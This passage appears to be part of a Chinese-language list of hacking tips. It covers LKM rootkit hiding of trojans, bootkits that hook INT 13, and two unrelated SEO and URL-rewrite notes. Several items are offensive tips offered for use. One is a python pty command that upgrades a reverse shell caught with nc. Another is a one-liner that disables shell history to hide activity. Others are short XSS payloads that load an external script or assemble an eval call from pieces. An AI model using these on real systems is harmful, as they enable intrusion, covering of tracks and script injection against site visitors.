4. LKM隐藏技术:
LKM就是可装载内核模块(Loadable Kernel Modules)。这些模块本来是Linux系统用于扩展其功能的。
木马最大的特性就是隐蔽性,不能轻易让人察觉,所以隐藏木马相关信息是关键的因素。对于Linux操作系统来说,主要有静态隐藏和动态隐藏两个标准。
由于Linux本身的安全性,想利用外壳程序隐藏木马文件和进程不可能实现,所以就借要通过修改Linux内核的系统调用来隐藏木马相关信息,这就是LKM技术。
5. Bootkit:Bootkit是更高级的Rootkit,该概念最早于2005年被eEye Digital公司在他们
“BootRoot”项目中提及。它主要利用其内核准入和开机过程的隐身技术,当在功能上并无异于Rootkit。他们的不同 主要表现在获取准入的方式上。传统的rootkit利用系统启动时提升权限。而Bootkit是被安置在外设的主引导扇区和驻留在整个系统的启动过程。
Bootkit的引导扇区代码总是在ROM BIOS执行后主引导记录被载入前劫持系统启动程序。一旦被载入到内存,代码便执行中断指令,也就是俗称的HOOK挂钩。它挂接到INT 13指示后续扇区读取其信息。这个过程完成后,Bootkit试图改变引导过程的结构和操作逻辑流程。
6. 用nst的反弹后门连上nc后不能su交互,报错如下:standard in must be a tty
解决方法:
python -c ’import pty; pty.spawn(“/bin/sh”)’
得到shell就可以su进行交互了。
7. history不记录:
unset HISTORY HISTFILE HISTSAVE HISTZONE HISTORY HISTLOG; export HISTFILE=/dev/null; export HISTSIZE=0; export HISTFILESIZE=0
8. 自己尝试最短的引入外部脚本的xss payload(28个字符):
<script src=/pj
注:是短域名转换
9. 有文章称<script src=//xxx.xxx/a.js></script>也可以插入,但是实测证明,不是每个浏览
器都支持没有http:的插入。要有效可靠的插入,还是参考上一条的插入方法。
10. 实在要短得不行的,那就分开来插吧:
<script>var a=’alert’</script>
<script>var b=’(“xss”)’</script>
<script>var c=a+b </script>
<script> eval(c) </script>
11. C类IP地址:C类数字相同的IP地址,通常是同一台服务器或是处于同一网络上的服
务器。所以如果两 个网站IP地址前三个数字相同,如198.197.196.195和198.197.196.194,搜索引擎会认为这两个网站之间是有一定关系的,很可 能在同一架服务器上。
12. URL静态化:通过URL重写技术,将动态URL转化为静态URL。在LAMP主机上,
URL重写通常是通过mod_rewrite模块;在windows主机上,通常是通过ISAPI Rewrite